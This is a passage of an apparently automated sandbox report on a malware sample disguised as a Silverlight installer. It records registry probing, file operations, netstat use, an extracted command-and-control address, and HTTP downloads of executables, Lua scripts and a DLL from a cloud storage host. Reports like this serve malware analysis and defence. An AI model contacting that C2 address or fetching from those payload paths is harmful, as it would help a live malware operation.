Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\Cleanup.pdbpT source: MSIE4C1.tmp, 00000018.00000000.267302140.0000000000C31000.00000020.00020000.sdmp
Source:	Binary string: sfxcab.pdb source: WhQZ6UbCEY.exe, 00000001.00000003.218859264.00000246AF9F6000.00000004.00000001.sdmp, Silverlight.exe
Source:	Binary string: coregen.pdb source: coregen.exe
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\Silverlight.Configuration.pdb source: Silverlight.Configuration.exe
Source:	Binary string: D:\coding\lua\WinFeature.pdb source: lua.exe, 0000002C.00000003.339656452.000000000097D000.00000004.00000001.sdmp
Source:	Binary string: sfxcab.pdbU source: WhQZ6UbCEY.exe, 00000001.00000003.218859264.00000246AF9F6000.00000004.00000001.sdmp, Silverlight.exe, 00000006.00000002.404426464.0000000001002000.00000020.00020000.sdmp
Source:	Binary string: D:\coding\rust\armutil\bin\target\release\deps\Silverlight.pdb source: WhQZ6UbCEY.exe, 00000001.00000002.230690102.00007FF7BF75E000.00000002.00020000.sdmp
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\InstallWAVE2-7zip.pdb 2C source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\Cleanup.pdb source: MSIE4C1.tmp
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\InstallWAVE2-7zip.pdb 2 source: install.exe, 0000000B.00000000.226207844.0000000001081000.00000020.00020000.sdmp
Source:	Binary string: f:\dd\xcp\Silverlight\Desktop_RET\Install.reswave2.pdb source: Silverlight.exe, 00000006.00000002.405821276.00000000046C1000.00000004.00000001.sdmp, install.exe

Spreading:

Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\WhQZ6UbCEY.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Silverlight.exe	Code function: 6_2_01004353 SendDlgItemMessageA,strstr,SetFileAttributesA,GetLastError,CopyFileA,SendDlgItemMessageA,strstr,SetFileAttributesA,CopyFileA,GetLastError,CopyFileA,SetFileAttributesA,SendDlgItemMessageA,_strlwr,GetLastError,MoveFileA,MoveFileA,_strlwr,strstr,FindFirstFileA,strrchr,SendDlgItemMessageA,DeleteFileA,Sleep,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,strrchr,SendDlgItemMessageA,	6_2_01004353
Source: C:\5a70dbc53fcf0baade86ff\install.exe	Code function: 11_2_010938F0 ExpandEnvironmentStringsW,_wcscpy_s,_wcscpy_s,_wcscat_s,FindFirstFileW,_wcscpy_s,WaitForSingleObject,_wcscpy_s,_wcscat_s,ShellExecuteExW,WaitForSingleObject,	11_2_010938F0
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C32540 LoadLibraryW,GetProcAddress,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,_wcscpy_s,_wcscat_s,FindFirstFileW,	24_2_00C32540
Source: C:\Windows\Installer\MSIE4C1.tmp	Code function: 24_2_00C326F0 ExpandEnvironmentStringsW,_wcscpy_s,_wcscat_s,MoveFileExW,_wcscpy_s,_wcscat_s,_wcscat_s,_wcscat_s,FindFirstFileW,_wcscpy_s,_wcscat_s,_wcscat_s,MoveFileExW,FindNextFileW,GetLastError,	24_2_00C326F0

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://45.154.13.94/F8JD2R
Source: Malware configuration extractor	URLs: 45.154.13.94

Uses netstat to query active network connections and open ports

Show sources

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -ano

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Mon, 12 Jul 2021 08:28:45 GMTContent-Type: application/octet-streamContent-Length: 7023448Connection: keep-alivex-oss-request-id: 60EBFD3D0754179C66CD4B1CAccept-Ranges: bytesETag: "7BAEBABAB6F0CA7B143068FDC17DFA41"Last-Modified: Wed, 16 Jun 2021 15:23:35 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 11733565972356082941x-oss-storage-class: StandardContent-Disposition: attachmentx-oss-force-download: trueContent-MD5: e666urbwynsUMGj9wX36QQ==x-oss-server-time: 2Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0f bd 8e c9 4b dc e0 9a 4b dc e0 9a 4b dc e0 9a c8 d4 bd 9a 44 dc e0 9a 4b dc e1 9a 21 dc e0 9a c5 d4 bf 9a 5f dc e0 9a c8 d4 be 9a 4a dc e0 9a c8 d4 ba 9a 4a dc e0 9a 52 69 63 68 4b dc e0 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 48 6e db 40 00 00 00 00 00 00 00 00 e0 00 0f 0d 0b 01 07 0a 00 78 00 00 00 0c 00 00 00 00 00 00 92 58 00 00 00 20 00 00 00 a0 00 00 00 00 00 01 00 20 00 00 00 02 00 00 05 00 02 00 05 00 02 00 04 00 00 00 00 00 00 00 00 e0 01 00 00 04 00 00 fe dc 6b 00 02 00 00 84 00 00 04 00 00 20 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 8d 00 00 a0 00 00 00 00 c0 01 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 ee 6a 00 58 3d 00 00 00 00 00 00 00 00 00 00 d0 21 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 77 00 00 00 20 00 00 00 78 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 d4 10 01 00 00 a0 00 00 00 02 00 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 09 00 00 00 c0 01 00 00 70 6a 00 00 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Mon, 12 Jul 2021 08:29:35 GMTContent-Type: application/octet-streamContent-Length: 136704Connection: closex-oss-request-id: 60EBFD6FEDBE2668A49AB367Accept-Ranges: bytesETag: "565E85C506595D312521995D631C2650"Last-Modified: Thu, 17 Jun 2021 13:28:13 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 2695529848333191165x-oss-storage-class: StandardContent-Disposition: attachmentx-oss-force-download: trueContent-MD5: Vl6FxQZZXTElIZldYxwmUA==x-oss-server-time: 25Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 df 32 93 a8 9b 53 fd fb 9b 53 fd fb 9b 53 fd fb 8f 38 fe fa 91 53 fd fb 8f 38 f8 fa 09 53 fd fb 8f 38 f9 fa 89 53 fd fb 8f 38 fb fa 9a 53 fd fb c9 26 f9 fa 94 53 fd fb c9 26 fe fa 88 53 fd fb c9 26 f8 fa b3 53 fd fb 8f 38 fc fa 91 53 fd fb bc 95 86 fb 98 53 fd fb 9b 53 fc fb fc 53 fd fb ce 26 f4 fa 9f 53 fd fb ce 26 fd fa 9a 53 fd fb ce 26 02 fb 9a 53 fd fb ce 26 ff fa 9a 53 fd fb 52 69 63 68 9b 53 fd fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e1 4b cb 60 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 74 01 00 00 aa 00 00 00 00 00 00 f3 37 00 00 00 10 00 00 00 90 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 02 00 00 04 00 00 00 00 00 00 03 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 01 02 00 58 00 00 00 18 02 02 00 8c 00 00 00 00 30 02 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 44 13 00 00 48 f0 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 f0 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 73 01 00 00 10 00 00 00 74 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a6 7a 00 00 00 90 01 00 00 7c 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 16 00 00 00 10 02 00 00 0c 00 00 00 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 30 02 00 00 02 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 44 13 00 00 00 40 02 00 00 14 00 00 00 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@

Source: global traffic	HTTP traffic detected: GET /Silverlight.exe HTTP/1.1accept: /host: softres.oss-accelerate.aliyuncs.com
Source: global traffic	HTTP traffic detected: GET /x86/1-CS-443.lua HTTP/1.1
Source: global traffic	HTTP traffic detected: GET /x86/Schedule.lua HTTP/1.1
Source: global traffic	HTTP traffic detected: GET /x86/ScheduleTask.dll HTTP/1.1
Source: global traffic	HTTP traffic detected: GET /ShellExperienceHost.zip HTTP/1.1

Source: Joe Sandbox View

